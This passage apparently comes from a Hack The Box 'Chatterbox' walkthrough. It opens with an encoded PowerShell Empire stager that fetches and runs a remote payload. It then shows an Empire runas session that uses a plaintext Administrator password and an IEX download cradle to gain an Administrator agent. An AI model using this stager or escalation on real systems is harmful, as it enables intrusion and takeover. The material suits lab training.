TABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwBZAHMAVABlAE0ALgBUAGUAeAB0AC4ARQBuAEMAbwBkAGkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAWQB0AEUAUwAoACcAPgB5AG4AKwA1AEcAKQBrACoAJQAuADgALQBiADQAQgBGAFoAQwBTADsAfgAzAGMAOQAsAGEAWAAoAHcAZgA8ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQA
UwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgA2ADoANAA0ADMAJwA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAdwBDAC4ASABFAEEAZABlAHIAUwAuAEEAZABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0ALwA4AHIAawBUAGUAbABBAEgAUABNAGcATwBWAHYAeABiADcAYgB2ADUAVQBlAHEATwBXAFkAPQAiACkAOwAkAEQAYQB0AGEAPQAkAFcAQwAuAEQAbwB3AG4AbABPAEEARABEAEEAdABBACgAJABTAEUAcgArACQAVAApADsAJABpAFYAPQAkAGQAQQB0AGEAWwAwAC4ALgAzAF0AOwAkAEQAYQB0AEEAPQAkAGQAQQBUAGEAWwA0AC4ALgAkAEQAQQB0AGEALgBMAEUATgBnAFQAaABdADsALQBKAG8AaQBOAFsAQwBoAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==

We run the exploit again; this time, when the target connects, it fetches the launcher instead of Nishang and an agent checks in. From that agent we use management/runas; only the Arguments line is shown below, UserName, Password and Domain were set the same way and are visible in the module info:

(Empire) > agents

[*] Active agents:

 Name 	La Internal IP 	Machine Name  	Username            	Process        	PID	Delay	Last Seen
 ---- 	-- ----------- 	------------  	--------            	-------        	---	-----	---------
 AF35EWGK ps 10.10.10.74 	CHATTERBOX    	CHATTERBOX\Alfred   	powershell     	28172  5/0.0	2019-10-26 10:23:47

(Empire: agents) > interact AF35EWGK
(Empire: AF35EWGK) > usemodule management/runas
(Empire: powershell/management/runas) > set Arguments "IEX(New-Object Net.webClient).downloadString('http://10.10.14.26/powershellreverse.ps1')"
(Empire: powershell/management/runas) > info

          	Name: Invoke-RunAs
        	Module: powershell/management/runas
    	NeedsAdmin: False
     	OpsecSafe: True
      	Language: powershell
MinLanguageVersion: 2
    	Background: False
   OutputExtension: None

Authors:
  rvrsh3ll (@424f424f)

Description:
  Runas knockoff. Will bypass GPO path restrictions.

Comments:
  https://github.com/rvrsh3ll/Misc-Powershell-
  Scripts/blob/master/RunAs.ps1

Options:

  Name   	Required	Value                 	Description
  ----   	--------	-------               	-----------
  UserName   False   	Administrator         	Username to run the command as.    	 
  CredID 	False                             	CredID from the store to use.      	 
  Domain 	False   	CHATTERBOX            	Optional domain.                   	 
  Cmd    	True    	Powershell            	Command to run.                    	 
  Arguments  False   	"IEX(New-Object Net.webC  Optional arguments for the supplied	 
                     	lient).downloadString('h  binary.                            	 
                     	ttp://10.10.14.26/powers
                     	hellreverse.ps1')" 	 
  ShowWindow False                             	Switch. Show the window for the created
                                               	process instead of hiding it.      	 
  Password   False   	Welcome1!             	Password for the specified username.    
  Agent  	True    	AF35EWGK              	Agent to run module on.            	 

(Empire: powershell/management/runas) > execute
[*] Tasked AF35EWGK to run TASK_CMD_WAIT
[*] Agent AF35EWGK tasked with task ID 6
[*] Tasked agent AF35EWGK to run module powershell/management/runas
(Empire: powershell/management/runas) > [*] Agent AF35EWGK returned results.

Handles  NPM(K)	PM(K)  	WS(K) VM(M)   CPU(s) 	Id ProcessName     	 
-------  ------	-----  	----- -----   ------ 	-- -----------     	 
  	0   	1  	228     	84 	2 	0.02  28988 powershell      	 



[*] Valid results returned by 10.10.10.74
[*] Sending POWERSHELL stager (stage 1) to 10.10.10.74
[*] New agent 1CYPDXW6 checked in
[+] Initial agent 1CYPDXW6 from 10.10.10.74 now active (Slack)
[*] Sending agent (stage 2) to 1CYPDXW6 at 10.10.10.74

(Empire: powershell/management/runas)
(Empire: powershell/management/runas) > agents

[*] Active agents:

 Name 	La Internal IP 	Machine Name  	Username            	Process        	PID	Delay	Last Seen
 ---- 	-- ----------- 	------------  	--------            	-------        	---	-----	---------
 AF35EWGK ps 10.10.10.74 	CHATTERBOX    	CHATTERBOX\Alfred   	powershell     	28172  5/0.0	2019-10-26 10:25:14
 1CYPDXW6 ps 10.10.10.74 	CHATTERBOX    	*CHATTERBOX\Administrat powershell     	22764  5/0.0	2019-10-26 10:25:14

(Empire: agents) > interact 1CYPDXW6
(Empire: 1CYPDXW6) > whoami
[*] Tasked 1CYPDXW6 to run TASK_SHELL
[*] Agent 1CYPDXW6 tasked with task ID 1
(Empire: 1CYPDXW6) > [*] Agent 1CYPDXW6 returned results.
CHATTERBOX\Administrator
[*] Valid results returned by 10.10.10.74

And done: we have an agent running as Administrator through Empire 🤯